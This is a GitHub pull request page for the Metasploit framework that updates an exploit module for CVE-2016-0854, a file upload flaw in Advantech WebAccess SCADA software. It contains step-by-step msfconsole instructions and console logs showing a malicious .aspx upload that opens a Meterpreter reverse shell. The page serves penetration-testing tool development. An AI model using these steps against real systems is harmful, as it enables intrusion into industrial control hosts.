Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Fix #6872, change upload action for CVE-2016-0854 exploit #6874

Merged
merged 1 commit into from May 14, 2016
Merged

Fix #6872, change upload action for CVE-2016-0854 exploit #6874

merged 1 commit into from May 14, 2016

Conversation

wchen-r7
Copy link
Contributor

@wchen-r7 wchen-r7 commented May 14, 2016
edited by bcook-r7

What This Patch Does

This patch includes the following changes for exploit/windows/scada/advantech_webaccess_dashboard_file_upload:

  • Instead of the uploadFile action, this patch uses uploadImageCommon to be able to support both Advantech WebAccess builds: 2014 and 2015.
  • It uses an explicit check instead of the passive version check.
  • It cleans up the malicious file after getting a session.
  • Added module documentation to explain the differences between different builds of Advantech WebAccess 8.0s, and 8.1.

Fix #6872

Verification

Testing for WebAccess 8.0 _20141103

  • Start a Windows 7 SP1 box
  • Make sure IIS is installed
  • Download WebAccess 8.0 _20141103.
  • Install WebAccess 8.0
  • Make sure WebAccess is up and running by checking it with a browser (on port 80)
  • Start msfconsole
  • Do: use exploit/windows/scada/advantech_webaccess_dashboard_file_upload
  • Do: info -d
  • msfconsole should spawn the module documentation (knowledge base) with a browser
  • Back to msfconsole, do: set RHOST [TARGET_IP]
  • Do: check
  • msfconsole should say that the target is vulnerable.
  • Do: exploit
  • You should get a session

Testing for WebAccess 8.0 _20150816

  • Start a Windows 7 SP1 box
  • Make sure IIS is installed
  • Download WebAccess 8.0 _20150816
  • Install WebAccess 8.0
  • Make sure WebAccess is up and running by checking it with a browser (on port 80)
  • Start msfconsole
  • Do: use exploit/windows/scada/advantech_webaccess_dashboard_file_upload
  • Back to msfconsole, do: set RHOST [TARGET_IP]
  • Do: check
  • msfconsole should say that the target is vulnerable.
  • Do: exploit
  • You should get a session

Demo

Both WebAccess 8.0 20150816 and 8.0 20141103 should give you a session like this:

msf exploit(advantech_webaccess_dashboard_file_upload) > check
[+] The target is vulnerable.
msf exploit(advantech_webaccess_dashboard_file_upload) > run

[*] Started reverse TCP handler on 192.168.1.209:4444 
[*] 192.168.1.201:80 - 192.168.1.201:80 - Uploading malicious file...
[*] 192.168.1.201:80 - Uploading: MYuXQ.aspx
[*] 192.168.1.201:80 - 192.168.1.201:80 - Executing MYuXQ.aspx...
[*] Sending stage (957999 bytes) to 192.168.1.201
[*] Meterpreter session 1 opened (192.168.1.209:4444 -> 192.168.1.201:49319) at 2016-05-13 18:42:46 -0500
[+] Deleted ../../../Inetpub/wwwroot/broadweb/WADashboard/MYuXQ.aspx

meterpreter >

@wchen-r7
Fix rapid7#6872, change upload action for CVE-2016-0854 exploit
3b5db26 
This patch includes the following changes:

* Instead of the uploadFile action, this patch uses uploadImageCommon
  to be able to support both Advantech WebAccess builds: 2014 and
  2015.
* It uses an explicit check instead of the passive version check.
* It cleans up the malicious file after getting a session.
* Added module documentation to explain the differences between
  different builds of Advantech WebAccess 8.0s, and 8.1.

Fix rapid7#6872
@nixawk
Copy link
Contributor

nixawk commented May 14, 2016

@wchen Thanks.

msf exploit(advantech_webaccess_dashboard_file_upload) > show options

Module options (exploit/windows/scada/advantech_webaccess_dashboard_file_upload):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   RHOST      192.168.1.103    yes       The target address
   RPORT      80               yes       The target port
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The base path of Advantech WebAccess 8.0
   VHOST                       no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   Advantech WebAccess 8.0


msf exploit(advantech_webaccess_dashboard_file_upload) > run

[*] Started reverse TCP handler on 192.168.1.102:4444
[*] 192.168.1.103:80 - 192.168.1.103:80 - Uploading malicious file...
[*] 192.168.1.103:80 - Uploading: iWOWo.aspx
[*] 192.168.1.103:80 - 192.168.1.103:80 - Executing iWOWo.aspx...
[*] Sending stage (957999 bytes) to 192.168.1.103
[*] Meterpreter session 1 opened (192.168.1.102:4444 -> 192.168.1.103:1361) at 2016-05-14 10:26:17 -0500
[+] Deleted ../../../Inetpub/wwwroot/broadweb/WADashboard/iWOWo.aspx

meterpreter > sysinfo
Computer        : GOOGLE
OS              : Windows 7 (Build 7600).
Architecture    : x64 (Current Process is WOW64)
System Language : zh_CN
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x86/win32

@bcook-r7 bcook-r7 self-assigned this May 14, 2016
@bcook-r7
Copy link
Contributor

bcook-r7 commented May 14, 2016
edited

Good enough for me, thanks @wchen-r7

@bcook-r7 bcook-r7 merged commit 3b5db26 into rapid7:master May 14, 2016
bcook-r7 pushed a commit that referenced this pull request May 14, 2016
Land #6874, Improve exploit for CVE-2016-0854
21d74a6
@bcook-r7
Copy link
Contributor

I made a couple of small changes that remove ternary no-ops: 0d176f2

@wchen-r7 wchen-r7 deleted the fix_6872 branch August 22, 2016 16:29
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees

@bcook-r7 bcook-r7

Labels
bug docs module
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
3 participants
@wchen-r7 @nixawk @bcook-r7